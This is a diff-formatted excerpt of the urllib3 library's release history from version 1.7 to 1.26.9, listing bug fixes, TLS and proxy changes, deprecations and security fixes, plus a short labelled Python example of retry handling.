https://tidelift.com/subscription/pkg/pypi-urllib3?utm_source=pypi-urllib3&utm_medium=referral&utm_campaign=readme + + +Changes +======= + +1.26.9 (2022-03-16) +------------------- + +* Changed ``urllib3[brotli]`` extra to favor installing Brotli libraries that are still + receiving updates like ``brotli`` and ``brotlicffi`` instead of ``brotlipy``. + This change does not impact behavior of urllib3, only which dependencies are installed. +* Fixed a socket leaking when ``HTTPSConnection.connect()`` raises an exception. +* Fixed ``server_hostname`` being forwarded from ``PoolManager`` to ``HTTPConnectionPool`` + when requesting an HTTP URL. Should only be forwarded when requesting an HTTPS URL. + + +1.26.8 (2022-01-07) +------------------- + +* Added extra message to ``urllib3.exceptions.ProxyError`` when urllib3 detects that + a proxy is configured to use HTTPS but the proxy itself appears to only use HTTP. +* Added a mention of the size of the connection pool when discarding a connection due to the pool being full. +* Added explicit support for Python 3.11. +* Deprecated the ``Retry.MAX_BACKOFF`` class property in favor of ``Retry.DEFAULT_MAX_BACKOFF`` + to better match the rest of the default parameter names. ``Retry.MAX_BACKOFF`` is removed in v2.0. +* Changed location of the vendored ``ssl.match_hostname`` function from ``urllib3.packages.ssl_match_hostname`` + to ``urllib3.util.ssl_match_hostname`` to ensure Python 3.10+ compatibility after being repackaged + by downstream distributors. +* Fixed absolute imports, all imports are now relative. + + +1.26.7 (2021-09-22) +------------------- + +* Fixed a bug with HTTPS hostname verification involving IP addresses and lack + of SNI. (Issue #2400) +* Fixed a bug where IPv6 braces weren't stripped during certificate hostname + matching. (Issue #2240) + + +1.26.6 (2021-06-25) +------------------- + +* Deprecated the ``urllib3.contrib.ntlmpool`` module. urllib3 is not able to support + it properly due to `reasons listed in this issue `_. + If you are a user of this module please leave a comment. 
+* Changed ``HTTPConnection.request_chunked()`` to not erroneously emit multiple + ``Transfer-Encoding`` headers in the case that one is already specified. +* Fixed typo in deprecation message to recommend ``Retry.DEFAULT_ALLOWED_METHODS``. + + +1.26.5 (2021-05-26) +------------------- + +* Fixed deprecation warnings emitted in Python 3.10. +* Updated vendored ``six`` library to 1.16.0. +* Improved performance of URL parser when splitting + the authority component. + + +1.26.4 (2021-03-15) +------------------- + +* Changed behavior of the default ``SSLContext`` when connecting to HTTPS proxy + during HTTPS requests. The default ``SSLContext`` now sets ``check_hostname=True``. + + +1.26.3 (2021-01-26) +------------------- + +* Fixed bytes and string comparison issue with headers (Pull #2141) + +* Changed ``ProxySchemeUnknown`` error message to be + more actionable if the user supplies a proxy URL without + a scheme. (Pull #2107) + + +1.26.2 (2020-11-12) +------------------- + +* Fixed an issue where ``wrap_socket`` and ``CERT_REQUIRED`` wouldn't + be imported properly on Python 2.7.8 and earlier (Pull #2052) + + +1.26.1 (2020-11-11) +------------------- + +* Fixed an issue where two ``User-Agent`` headers would be sent if a + ``User-Agent`` header key is passed as ``bytes`` (Pull #2047) + + +1.26.0 (2020-11-10) +------------------- + +* **NOTE: urllib3 v2.0 will drop support for Python 2**. + `Read more in the v2.0 Roadmap `_. + +* Added support for HTTPS proxies contacting HTTPS servers (Pull #1923, Pull #1806) + +* Deprecated negotiating TLSv1 and TLSv1.1 by default. Users that + still wish to use TLS earlier than 1.2 without a deprecation warning + should opt-in explicitly by setting ``ssl_version=ssl.PROTOCOL_TLSv1_1`` (Pull #2002) + **Starting in urllib3 v2.0: Connections that receive a ``DeprecationWarning`` will fail** + +* Deprecated ``Retry`` options ``Retry.DEFAULT_METHOD_WHITELIST``, ``Retry.DEFAULT_REDIRECT_HEADERS_BLACKLIST`` + and ``Retry(method_whitelist=...)`` in favor of ``Retry.DEFAULT_ALLOWED_METHODS``, + ``Retry.DEFAULT_REMOVE_HEADERS_ON_REDIRECT``, and ``Retry(allowed_methods=...)`` + (Pull #2000) **Starting in urllib3 v2.0: Deprecated options will be removed** + +* Added default ``User-Agent`` header to every request (Pull #1750) + +* Added ``urllib3.util.SKIP_HEADER`` for skipping ``User-Agent``, ``Accept-Encoding``, + and ``Host`` headers from being automatically emitted with requests (Pull #2018) + +* Collapse ``transfer-encoding: chunked`` request data and framing into + the same ``socket.send()`` call (Pull #1906) + +* Send ``http/1.1`` ALPN identifier with every TLS handshake by default (Pull #1894) + +* Properly terminate SecureTransport connections when CA verification fails (Pull #1977) + +* Don't emit an ``SNIMissingWarning`` when passing ``server_hostname=None`` + to SecureTransport (Pull #1903) + +* Disabled requesting TLSv1.2 session tickets as they weren't being used by urllib3 (Pull #1970) + +* Suppress ``BrokenPipeError`` when writing request body after the server + has closed the socket (Pull #1524) + +* Wrap ``ssl.SSLError`` that can be raised from reading a socket (e.g. "bad MAC") + into an ``urllib3.exceptions.SSLError`` (Pull #1939) + + +1.25.11 (2020-10-19) +-------------------- + +* Fix retry backoff time parsed from ``Retry-After`` header when given + in the HTTP date format. 
The HTTP date was parsed as the local timezone + rather than accounting for the timezone in the HTTP date (typically + UTC) (Pull #1932, Pull #1935, Pull #1938, Pull #1949) + +* Fix issue where an error would be raised when the ``SSLKEYLOGFILE`` + environment variable was set to the empty string. Now ``SSLContext.keylog_file`` + is not set in this situation (Pull #2016) + + +1.25.10 (2020-07-22) +-------------------- + +* Added support for ``SSLKEYLOGFILE`` environment variable for + logging TLS session keys with use with programs like + Wireshark for decrypting captured web traffic (Pull #1867) + +* Fixed loading of SecureTransport libraries on macOS Big Sur + due to the new dynamic linker cache (Pull #1905) + +* Collapse chunked request bodies data and framing into one + call to ``send()`` to reduce the number of TCP packets by 2-4x (Pull #1906) + +* Don't insert ``None`` into ``ConnectionPool`` if the pool + was empty when requesting a connection (Pull #1866) + +* Avoid ``hasattr`` call in ``BrotliDecoder.decompress()`` (Pull #1858) + + +1.25.9 (2020-04-16) +------------------- + +* Added ``InvalidProxyConfigurationWarning`` which is raised when + erroneously specifying an HTTPS proxy URL. urllib3 doesn't currently + support connecting to HTTPS proxies but will soon be able to + and we would like users to migrate properly without much breakage. + + See `this GitHub issue `_ + for more information on how to fix your proxy config. (Pull #1851) + +* Drain connection after ``PoolManager`` redirect (Pull #1817) + +* Ensure ``load_verify_locations`` raises ``SSLError`` for all backends (Pull #1812) + +* Rename ``VerifiedHTTPSConnection`` to ``HTTPSConnection`` (Pull #1805) + +* Allow the CA certificate data to be passed as a string (Pull #1804) + +* Raise ``ValueError`` if method contains control characters (Pull #1800) + +* Add ``__repr__`` to ``Timeout`` (Pull #1795) + + +1.25.8 (2020-01-20) +------------------- + +* Drop support for EOL Python 3.4 (Pull #1774) + +* Optimize _encode_invalid_chars (Pull #1787) + + +1.25.7 (2019-11-11) +------------------- + +* Preserve ``chunked`` parameter on retries (Pull #1715, Pull #1734) + +* Allow unset ``SERVER_SOFTWARE`` in App Engine (Pull #1704, Issue #1470) + +* Fix issue where URL fragment was sent within the request target. (Pull #1732) + +* Fix issue where an empty query section in a URL would fail to parse. (Pull #1732) + +* Remove TLS 1.3 support in SecureTransport due to Apple removing support (Pull #1703) + + +1.25.6 (2019-09-24) +------------------- + +* Fix issue where tilde (``~``) characters were incorrectly + percent-encoded in the path. (Pull #1692) + + +1.25.5 (2019-09-19) +------------------- + +* Add mitigation for BPO-37428 affecting Python <3.7.4 and OpenSSL 1.1.1+ which + caused certificate verification to be enabled when using ``cert_reqs=CERT_NONE``. + (Issue #1682) + + +1.25.4 (2019-09-19) +------------------- + +* Propagate Retry-After header settings to subsequent retries. (Pull #1607) + +* Fix edge case where Retry-After header was still respected even when + explicitly opted out of. (Pull #1607) + +* Remove dependency on ``rfc3986`` for URL parsing. + +* Fix issue where URLs containing invalid characters within ``Url.auth`` would + raise an exception instead of percent-encoding those characters. + +* Add support for ``HTTPResponse.auto_close = False`` which makes HTTP responses + work well with BufferedReaders and other ``io`` module features. 
(Pull #1652) + +* Percent-encode invalid characters in URL for ``HTTPConnectionPool.request()`` (Pull #1673) + + +1.25.3 (2019-05-23) +------------------- + +* Change ``HTTPSConnection`` to load system CA certificates + when ``ca_certs``, ``ca_cert_dir``, and ``ssl_context`` are + unspecified. (Pull #1608, Issue #1603) + +* Upgrade bundled rfc3986 to v1.3.2. (Pull #1609, Issue #1605) + + +1.25.2 (2019-04-28) +------------------- + +* Change ``is_ipaddress`` to not detect IPvFuture addresses. (Pull #1583) + +* Change ``parse_url`` to percent-encode invalid characters within the + path, query, and target components. (Pull #1586) + + +1.25.1 (2019-04-24) +------------------- + +* Add support for Google's ``Brotli`` package. (Pull #1572, Pull #1579) + +* Upgrade bundled rfc3986 to v1.3.1 (Pull #1578) + + +1.25 (2019-04-22) +----------------- + +* Require and validate certificates by default when using HTTPS (Pull #1507) + +* Upgraded ``urllib3.utils.parse_url()`` to be RFC 3986 compliant. (Pull #1487) + +* Added support for ``key_password`` for ``HTTPSConnectionPool`` to use + encrypted ``key_file`` without creating your own ``SSLContext`` object. (Pull #1489) + +* Add TLSv1.3 support to CPython, pyOpenSSL, and SecureTransport ``SSLContext`` + implementations. (Pull #1496) + +* Switched the default multipart header encoder from RFC 2231 to HTML 5 working draft. (Issue #303, Pull #1492) + +* Fixed issue where OpenSSL would block if an encrypted client private key was + given and no password was given. Instead an ``SSLError`` is raised. (Pull #1489) + +* Added support for Brotli content encoding. It is enabled automatically if + ``brotlipy`` package is installed which can be requested with + ``urllib3[brotli]`` extra. (Pull #1532) + +* Drop ciphers using DSS key exchange from default TLS cipher suites. + Improve default ciphers when using SecureTransport. (Pull #1496) + +* Implemented a more efficient ``HTTPResponse.__iter__()`` method. (Issue #1483) + +1.24.3 (2019-05-01) +------------------- + +* Apply fix for CVE-2019-9740. (Pull #1591) + +1.24.2 (2019-04-17) +------------------- + +* Don't load system certificates by default when any other ``ca_certs``, ``ca_certs_dir`` or + ``ssl_context`` parameters are specified. + +* Remove Authorization header regardless of case when redirecting to cross-site. (Issue #1510) + +* Add support for IPv6 addresses in subjectAltName section of certificates. (Issue #1269) + + +1.24.1 (2018-11-02) +------------------- + +* Remove quadratic behavior within ``GzipDecoder.decompress()`` (Issue #1467) + +* Restored functionality of ``ciphers`` parameter for ``create_urllib3_context()``. (Issue #1462) + + +1.24 (2018-10-16) +----------------- + +* Allow key_server_hostname to be specified when initializing a PoolManager to allow custom SNI to be overridden. (Pull #1449) + +* Test against Python 3.7 on AppVeyor. (Pull #1453) + +* Early-out ipv6 checks when running on App Engine. (Pull #1450) + +* Change ambiguous description of backoff_factor (Pull #1436) + +* Add ability to handle multiple Content-Encodings (Issue #1441 and Pull #1442) + +* Skip DNS names that can't be idna-decoded when using pyOpenSSL (Issue #1405). + +* Add a server_hostname parameter to HTTPSConnection which allows for + overriding the SNI hostname sent in the handshake. (Pull #1397) + +* Drop support for EOL Python 2.6 (Pull #1429 and Pull #1430) + +* Fixed bug where responses with header Content-Type: message/* erroneously + raised HeaderParsingError, resulting in a warning being logged. 
(Pull #1439) + +* Move urllib3 to src/urllib3 (Pull #1409) + + +1.23 (2018-06-04) +----------------- + +* Allow providing a list of headers to strip from requests when redirecting + to a different host. Defaults to the ``Authorization`` header. Different + headers can be set via ``Retry.remove_headers_on_redirect``. (Issue #1316) + +* Fix ``util.selectors._fileobj_to_fd`` to accept ``long`` (Issue #1247). + +* Dropped Python 3.3 support. (Pull #1242) + +* Put the connection back in the pool when calling stream() or read_chunked() on + a chunked HEAD response. (Issue #1234) + +* Fixed pyOpenSSL-specific ssl client authentication issue when clients + attempted to auth via certificate + chain (Issue #1060) + +* Add the port to the connectionpool connect print (Pull #1251) + +* Don't use the ``uuid`` module to create multipart data boundaries. (Pull #1380) + +* ``read_chunked()`` on a closed response returns no chunks. (Issue #1088) + +* Add Python 2.6 support to ``contrib.securetransport`` (Pull #1359) + +* Added support for auth info in url for SOCKS proxy (Pull #1363) + + +1.22 (2017-07-20) +----------------- + +* Fixed missing brackets in ``HTTP CONNECT`` when connecting to IPv6 address via + IPv6 proxy. (Issue #1222) + +* Made the connection pool retry on ``SSLError``. The original ``SSLError`` + is available on ``MaxRetryError.reason``. (Issue #1112) + +* Drain and release connection before recursing on retry/redirect. Fixes + deadlocks with a blocking connectionpool. (Issue #1167) + +* Fixed compatibility for cookiejar. (Issue #1229) + +* pyopenssl: Use vendored version of ``six``. (Issue #1231) + + +1.21.1 (2017-05-02) +------------------- + +* Fixed SecureTransport issue that would cause long delays in response body + delivery. (Pull #1154) + +* Fixed regression in 1.21 that threw exceptions when users passed the + ``socket_options`` flag to the ``PoolManager``. (Issue #1165) + +* Fixed regression in 1.21 that threw exceptions when users passed the + ``assert_hostname`` or ``assert_fingerprint`` flag to the ``PoolManager``. + (Pull #1157) + + +1.21 (2017-04-25) +----------------- + +* Improved performance of certain selector system calls on Python 3.5 and + later. (Pull #1095) + +* Resolved issue where the PyOpenSSL backend would not wrap SysCallError + exceptions appropriately when sending data. (Pull #1125) + +* Selectors now detects a monkey-patched select module after import for modules + that patch the select module like eventlet, greenlet. (Pull #1128) + +* Reduced memory consumption when streaming zlib-compressed responses + (as opposed to raw deflate streams). (Pull #1129) + +* Connection pools now use the entire request context when constructing the + pool key. (Pull #1016) + +* ``PoolManager.connection_from_*`` methods now accept a new keyword argument, + ``pool_kwargs``, which are merged with the existing ``connection_pool_kw``. + (Pull #1016) + +* Add retry counter for ``status_forcelist``. (Issue #1147) + +* Added ``contrib`` module for using SecureTransport on macOS: + ``urllib3.contrib.securetransport``. (Pull #1122) + +* urllib3 now only normalizes the case of ``http://`` and ``https://`` schemes: + for schemes it does not recognise, it assumes they are case-sensitive and + leaves them unchanged. + (Issue #1080) + + +1.20 (2017-01-19) +----------------- + +* Added support for waiting for I/O using selectors other than select, + improving urllib3's behaviour with large numbers of concurrent connections. + (Pull #1001) + +* Updated the date for the system clock check. 
(Issue #1005) + +* ConnectionPools now correctly consider hostnames to be case-insensitive. + (Issue #1032) + +* Outdated versions of PyOpenSSL now cause the PyOpenSSL contrib module + to fail when it is injected, rather than at first use. (Pull #1063) + +* Outdated versions of cryptography now cause the PyOpenSSL contrib module + to fail when it is injected, rather than at first use. (Issue #1044) + +* Automatically attempt to rewind a file-like body object when a request is + retried or redirected. (Pull #1039) + +* Fix some bugs that occur when modules incautiously patch the queue module. + (Pull #1061) + +* Prevent retries from occurring on read timeouts for which the request method + was not in the method whitelist. (Issue #1059) + +* Changed the PyOpenSSL contrib module to lazily load idna to avoid + unnecessarily bloating the memory of programs that don't need it. (Pull + #1076) + +* Add support for IPv6 literals with zone identifiers. (Pull #1013) + +* Added support for socks5h:// and socks4a:// schemes when working with SOCKS + proxies, and controlled remote DNS appropriately. (Issue #1035) + + +1.19.1 (2016-11-16) +------------------- + +* Fixed AppEngine import that didn't function on Python 3.5. (Pull #1025) + + +1.19 (2016-11-03) +----------------- + +* urllib3 now respects Retry-After headers on 413, 429, and 503 responses when + using the default retry logic. (Pull #955) + +* Remove markers from setup.py to assist ancient setuptools versions. (Issue + #986) + +* Disallow superscripts and other integerish things in URL ports. (Issue #989) + +* Allow urllib3's HTTPResponse.stream() method to continue to work with + non-httplib underlying FPs. (Pull #990) + +* Empty filenames in multipart headers are now emitted as such, rather than + being suppressed. (Issue #1015) + +* Prefer user-supplied Host headers on chunked uploads. (Issue #1009) + + +1.18.1 (2016-10-27) +------------------- + +* CVE-2016-9015. Users who are using urllib3 version 1.17 or 1.18 along with + PyOpenSSL injection and OpenSSL 1.1.0 *must* upgrade to this version. This + release fixes a vulnerability whereby urllib3 in the above configuration + would silently fail to validate TLS certificates due to erroneously setting + invalid flags in OpenSSL's ``SSL_CTX_set_verify`` function. These erroneous + flags do not cause a problem in OpenSSL versions before 1.1.0, which + interprets the presence of any flag as requesting certificate validation. + + There is no PR for this patch, as it was prepared for simultaneous disclosure + and release. The master branch received the same fix in Pull #1010. + + +1.18 (2016-09-26) +----------------- + +* Fixed incorrect message for IncompleteRead exception. (Pull #973) + +* Accept ``iPAddress`` subject alternative name fields in TLS certificates. + (Issue #258) + +* Fixed consistency of ``HTTPResponse.closed`` between Python 2 and 3. + (Issue #977) + +* Fixed handling of wildcard certificates when using PyOpenSSL. (Issue #979) + + +1.17 (2016-09-06) +----------------- + +* Accept ``SSLContext`` objects for use in SSL/TLS negotiation. (Issue #835) + +* ConnectionPool debug log now includes scheme, host, and port. (Issue #897) + +* Substantially refactored documentation. (Issue #887) + +* Used URLFetch default timeout on AppEngine, rather than hardcoding our own. + (Issue #858) + +* Normalize the scheme and host in the URL parser (Issue #833) + +* ``HTTPResponse`` contains the last ``Retry`` object, which now also + contains retries history. 
(Issue #848) + +* Timeout can no longer be set as boolean, and must be greater than zero. + (Pull #924) + +* Removed pyasn1 and ndg-httpsclient from dependencies used for PyOpenSSL. We + now use cryptography and idna, both of which are already dependencies of + PyOpenSSL. (Pull #930) + +* Fixed infinite loop in ``stream`` when amt=None. (Issue #928) + +* Try to use the operating system's certificates when we are using an + ``SSLContext``. (Pull #941) + +* Updated cipher suite list to allow ChaCha20+Poly1305. AES-GCM is preferred to + ChaCha20, but ChaCha20 is then preferred to everything else. (Pull #947) + +* Updated cipher suite list to remove 3DES-based cipher suites. (Pull #958) + +* Removed the cipher suite fallback to allow HIGH ciphers. (Pull #958) + +* Implemented ``length_remaining`` to determine remaining content + to be read. (Pull #949) + +* Implemented ``enforce_content_length`` to enable exceptions when + incomplete data chunks are received. (Pull #949) + +* Dropped connection start, dropped connection reset, redirect, forced retry, + and new HTTPS connection log levels to DEBUG, from INFO. (Pull #967) + + +1.16 (2016-06-11) +----------------- + +* Disable IPv6 DNS when IPv6 connections are not possible. (Issue #840) + +* Provide ``key_fn_by_scheme`` pool keying mechanism that can be + overridden. (Issue #830) + +* Normalize scheme and host to lowercase for pool keys, and include + ``source_address``. (Issue #830) + +* Cleaner exception chain in Python 3 for ``_make_request``. + (Issue #861) + +* Fixed installing ``urllib3[socks]`` extra. (Issue #864) + +* Fixed signature of ``ConnectionPool.close`` so it can actually safely be + called by subclasses. (Issue #873) + +* Retain ``release_conn`` state across retries. (Issues #651, #866) + +* Add customizable ``HTTPConnectionPool.ResponseCls``, which defaults to + ``HTTPResponse`` but can be replaced with a subclass. (Issue #879) + + +1.15.1 (2016-04-11) +------------------- + +* Fix packaging to include backports module. (Issue #841) + + +1.15 (2016-04-06) +----------------- + +* Added Retry(raise_on_status=False). (Issue #720) + +* Always use setuptools, no more distutils fallback. (Issue #785) + +* Dropped support for Python 3.2. (Issue #786) + +* Chunked transfer encoding when requesting with ``chunked=True``. + (Issue #790) + +* Fixed regression with IPv6 port parsing. (Issue #801) + +* Append SNIMissingWarning messages to allow users to specify it in + the PYTHONWARNINGS environment variable. (Issue #816) + +* Handle unicode headers in Py2. (Issue #818) + +* Log certificate when there is a hostname mismatch. (Issue #820) + +* Preserve order of request/response headers. (Issue #821) + + +1.14 (2015-12-29) +----------------- + +* contrib: SOCKS proxy support! (Issue #762) + +* Fixed AppEngine handling of transfer-encoding header and bug + in Timeout defaults checking. (Issue #763) + + +1.13.1 (2015-12-18) +------------------- + +* Fixed regression in IPv6 + SSL for match_hostname. (Issue #761) + + +1.13 (2015-12-14) +----------------- + +* Fixed ``pip install urllib3[secure]`` on modern pip. (Issue #706) + +* pyopenssl: Fixed SSL3_WRITE_PENDING error. (Issue #717) + +* pyopenssl: Support for TLSv1.1 and TLSv1.2. (Issue #696) + +* Close connections more defensively on exception. (Issue #734) + +* Adjusted ``read_chunked`` to handle gzipped, chunk-encoded bodies without + repeatedly flushing the decoder, to function better on Jython. (Issue #743) + +* Accept ``ca_cert_dir`` for SSL-related PoolManager configuration. 
(Issue #758)
+
+
+1.12 (2015-09-03)
+-----------------
+
+* Rely on ``six`` for importing ``httplib`` to work around
+  conflicts with other Python 3 shims. (Issue #688)
+
+* Add support for directories of certificate authorities, as supported by
+  OpenSSL. (Issue #701)
+
+* New exception: ``NewConnectionError``, raised when we fail to establish
+  a new connection, usually ``ECONNREFUSED`` socket error.
+
+
+1.11 (2015-07-21)
+-----------------
+
+* When ``ca_certs`` is given, ``cert_reqs`` defaults to
+  ``'CERT_REQUIRED'``. (Issue #650)
+
+* ``pip install urllib3[secure]`` will install Certifi and
+  PyOpenSSL as dependencies. (Issue #678)
+
+* Made ``HTTPHeaderDict`` usable as a ``headers`` input value
+  (Issues #632, #679)
+
+* Added ``urllib3.contrib.appengine``
+  which has an ``AppEngineManager`` for using ``URLFetch`` in a
+  Google AppEngine environment. (Issue #664)
+
+* Dev: Added test suite for AppEngine. (Issue #631)
+
+* Fix performance regression when using PyOpenSSL. (Issue #626)
+
+* Passing incorrect scheme (e.g. ``foo://``) will raise
+  ``ValueError`` instead of ``AssertionError`` (backwards
+  compatible for now, but please migrate). (Issue #640)
+
+* Fix pools not getting replenished when an error occurs during a
+  request using ``release_conn=False``. (Issue #644)
+
+* Fix pool-default headers not applying for url-encoded requests
+  like GET. (Issue #657)
+
+* log.warning in Python 3 when headers are skipped due to parsing
+  errors. (Issue #642)
+
+* Close and discard connections if an error occurs during read.
+  (Issue #660)
+
+* Fix host parsing for IPv6 proxies. (Issue #668)
+
+* Separate warning type SubjectAltNameWarning, now issued once
+  per host. (Issue #671)
+
+* Fix ``httplib.IncompleteRead`` not getting converted to
+  ``ProtocolError`` when using ``HTTPResponse.stream()``
+  (Issue #674)
+
+1.10.4 (2015-05-03)
+-------------------
+
+* Migrate tests to Tornado 4. (Issue #594)
+
+* Append default warning configuration rather than overwrite.
+  (Issue #603)
+
+* Fix streaming decoding regression. (Issue #595)
+
+* Fix chunked requests losing state across keep-alive connections.
+  (Issue #599)
+
+* Fix hanging when chunked HEAD response has no body. (Issue #605)
+
+
+1.10.3 (2015-04-21)
+-------------------
+
+* Emit ``InsecurePlatformWarning`` when SSLContext object is missing.
+  (Issue #558)
+
+* Fix regression of duplicate header keys being discarded.
+  (Issue #563)
+
+* ``Response.stream()`` returns a generator for chunked responses.
+  (Issue #560)
+
+* Set upper-bound timeout when waiting for a socket in PyOpenSSL.
+  (Issue #585)
+
+* Work on platforms without `ssl` module for plain HTTP requests.
+  (Issue #587)
+
+* Stop relying on the stdlib's default cipher list. (Issue #588)
+
+
+1.10.2 (2015-02-25)
+-------------------
+
+* Fix file descriptor leakage on retries. (Issue #548)
+
+* Removed RC4 from default cipher list. (Issue #551)
+
+* Header performance improvements. (Issue #544)
+
+* Fix PoolManager not obeying redirect retry settings. (Issue #553)
+
+
+1.10.1 (2015-02-10)
+-------------------
+
+* Pools can be used as context managers. (Issue #545)
+
+* Don't re-use connections which experienced an SSLError. (Issue #529)
+
+* Don't fail when gzip decoding an empty stream. (Issue #535)
+
+* Add sha256 support for fingerprint verification. (Issue #540)
+
+* Fixed handling of header values containing commas. (Issue #533)
+
+
+1.10 (2014-12-14)
+-----------------
+
+* Disabled SSLv3. (Issue #473)
+
+* Add ``Url.url`` property to return the composed url string. (Issue #394)
+
+* Fixed PyOpenSSL + gevent ``WantWriteError``. (Issue #412)
+
+* ``MaxRetryError.reason`` will always be an exception, not string.
+  (Issue #481)
+
+* Fixed SSL-related timeouts not being detected as timeouts. (Issue #492)
+
+* Py3: Use ``ssl.create_default_context()`` when available. (Issue #473)
+
+* Emit ``InsecureRequestWarning`` for *every* insecure HTTPS request.
+  (Issue #496)
+
+* Emit ``SecurityWarning`` when certificate has no ``subjectAltName``.
+  (Issue #499)
+
+* Close and discard sockets which experienced SSL-related errors.
+  (Issue #501)
+
+* Handle ``body`` param in ``.request(...)``. (Issue #513)
+
+* Respect timeout with HTTPS proxy. (Issue #505)
+
+* PyOpenSSL: Handle ZeroReturnError exception. (Issue #520)
+
+
+1.9.1 (2014-09-13)
+------------------
+
+* Apply socket arguments before binding. (Issue #427)
+
+* More careful checks if fp-like object is closed. (Issue #435)
+
+* Fixed packaging issues of some development-related files not
+  getting included. (Issue #440)
+
+* Allow performing *only* fingerprint verification. (Issue #444)
+
+* Emit ``SecurityWarning`` if system clock is waaay off. (Issue #445)
+
+* Fixed PyOpenSSL compatibility with PyPy. (Issue #450)
+
+* Fixed ``BrokenPipeError`` and ``ConnectionError`` handling in Py3.
+  (Issue #443)
+
+
+
+1.9 (2014-07-04)
+----------------
+
+* Shuffled around development-related files. If you're maintaining a distro
+  package of urllib3, you may need to tweak things. (Issue #415)
+
+* Unverified HTTPS requests will trigger a warning on the first request. See
+  our new security documentation for details.
+  (Issue #426)
+
+* New retry logic and ``urllib3.util.retry.Retry`` configuration object.
+  (Issue #326)
+
+* All raised exceptions should now be wrapped in a
+  ``urllib3.exceptions.HTTPException``-extending exception. (Issue #326)
+
+* All errors during a retry-enabled request should be wrapped in
+  ``urllib3.exceptions.MaxRetryError``, including timeout-related exceptions
+  which were previously exempt. Underlying error is accessible from the
+  ``.reason`` property. (Issue #326)
+
+* ``urllib3.exceptions.ConnectionError`` renamed to
+  ``urllib3.exceptions.ProtocolError``. (Issue #326)
+
+* Errors during response read (such as IncompleteRead) are now wrapped in
+  ``urllib3.exceptions.ProtocolError``. (Issue #418)
+
+* Requesting an empty host will raise ``urllib3.exceptions.LocationValueError``.
+  (Issue #417)
+
+* Catch read timeouts over SSL connections as
+  ``urllib3.exceptions.ReadTimeoutError``. (Issue #419)
+
+* Apply socket arguments before connecting. (Issue #427)
+
+
+1.8.3 (2014-06-23)
+------------------
+
+* Fix TLS verification when using a proxy in Python 3.4.1. (Issue #385)
+
+* Add ``disable_cache`` option to ``urllib3.util.make_headers``. (Issue #393)
+
+* Wrap ``socket.timeout`` exception with
+  ``urllib3.exceptions.ReadTimeoutError``. (Issue #399)
+
+* Fixed proxy-related bug where connections were being reused incorrectly.
+  (Issues #366, #369)
+
+* Added ``socket_options`` keyword parameter which allows defining
+  ``setsockopt`` configuration of new sockets. (Issue #397)
+
+* Removed ``HTTPConnection.tcp_nodelay`` in favor of
+  ``HTTPConnection.default_socket_options``. (Issue #397)
+
+* Fixed ``TypeError`` bug in Python 2.6.4. (Issue #411)
+
+
+1.8.2 (2014-04-17)
+------------------
+
+* Fix ``urllib3.util`` not being included in the package.
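+
+As a worked illustration of the retry and exception-wrapping behaviour
+described in the 1.9 notes above, here is a minimal sketch (not part of the
+original release notes). It uses the public names these entries mention
+(``urllib3.PoolManager``, ``urllib3.util.retry.Retry``,
+``urllib3.exceptions.MaxRetryError``); the host and parameter values are
+illustrative placeholders:
+
+.. code-block:: python
+
+   import urllib3
+   from urllib3.exceptions import MaxRetryError
+   from urllib3.util.retry import Retry
+
+   # Retry configuration object introduced in 1.9 (Issue #326):
+   # up to 3 attempts, with exponential backoff between them.
+   retries = Retry(total=3, backoff_factor=0.5)
+   http = urllib3.PoolManager(retries=retries)
+
+   try:
+       # "example.invalid" is a placeholder host; connect errors and
+       # timeouts are wrapped in MaxRetryError once retries are exhausted.
+       http.request("GET", "http://example.invalid/")
+   except MaxRetryError as exc:
+       # The underlying error is exposed on the .reason property
+       # (None means the retries were exhausted by redirects).
+       print("Request failed after retries:", exc.reason)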
+
+
+1.8.1 (2014-04-17)
+------------------
+
+* Fix AppEngine bug of HTTPS requests going out as HTTP. (Issue #356)
+
+* Don't install ``dummyserver`` into ``site-packages`` as it's only needed
+  for the test suite. (Issue #362)
+
+* Added support for specifying ``source_address``. (Issue #352)
+
+
+1.8 (2014-03-04)
+----------------
+
+* Improved url parsing in ``urllib3.util.parse_url`` (properly parse '@' in
+  username, and blank ports like 'hostname:').
+
+* New ``urllib3.connection`` module which contains all the HTTPConnection
+  objects.
+
+* Several ``urllib3.util.Timeout``-related fixes. Also changed constructor
+  signature to a more sensible order. [Backwards incompatible]
+  (Issues #252, #262, #263)
+
+* Use ``backports.ssl_match_hostname`` if it's installed. (Issue #274)
+
+* Added ``.tell()`` method to ``urllib3.response.HTTPResponse`` which
+  returns the number of bytes read so far. (Issue #277)
+
+* Support for platforms without threading. (Issue #289)
+
+* Expand default-port comparison in ``HTTPConnectionPool.is_same_host``
+  to allow a pool with no specified port to be considered equal to an
+  HTTP/HTTPS url with port 80/443 explicitly provided. (Issue #305)
+
+* Improved default SSL/TLS settings to avoid vulnerabilities.
+  (Issue #309)
+
+* Fixed ``urllib3.poolmanager.ProxyManager`` not retrying on connect errors.
+  (Issue #310)
+
+* Disable Nagle's Algorithm on the socket for non-proxies. A subset of requests
+  will send the entire HTTP request ~200 milliseconds faster; however, some of
+  the resulting TCP packets will be smaller. (Issue #254)
+
+* Increased maximum number of SubjectAltNames in ``urllib3.contrib.pyopenssl``
+  from the default 64 to 1024 in a single certificate. (Issue #318)
+
+* Headers are now passed and stored as a custom
+  ``urllib3.collections_.HTTPHeaderDict`` object rather than a plain ``dict``.
+  (Issue #329, #333)
+
+* Headers no longer lose their case on Python 3. (Issue #236)
+
+* ``urllib3.contrib.pyopenssl`` now uses the operating system's default CA
+  certificates on inject. (Issue #332)
+
+* Requests with ``retries=False`` will immediately raise any exceptions without
+  wrapping them in ``MaxRetryError``. (Issue #348)
+
+* Fixed open socket leak with SSL-related failures. (Issue #344, #348)
+
+
+1.7.1 (2013-09-25)
+------------------
+
+* Added granular timeout support with new ``urllib3.util.Timeout`` class.
+  (Issue #231)
+
+* Fixed Python 3.4 support. (Issue #238)
+
+
+1.7 (2013-08-14)
+----------------
+
+* More exceptions are now pickle-able, with tests. (Issue #174)
+
+* Fixed redirecting with relative URLs in Location header. (Issue #178)
+
+* Support for relative urls in ``Location: ...`` header. (Issue #179)
+
+* ``urllib3.response.HTTPResponse`` now inherits from ``io.IOBase`` for bonus
+  file-like functionality. (Issue #187)
+
+* Passing ``assert_hostname=False`` when creating an HTTPSConnectionPool will
+  skip hostname verification for SSL connections. (Issue #194)
+
+* New method ``urllib3.response.HTTPResponse.stream(...)`` which acts as a
+  generator wrapped around ``.read(...)``. (Issue #198)
+
+* IPv6 url parsing enforces brackets around the hostname. (Issue #199)
+
+* Fixed thread race condition in
+  ``urllib3.poolmanager.PoolManager.connection_from_host(...)`` (Issue #204)
+
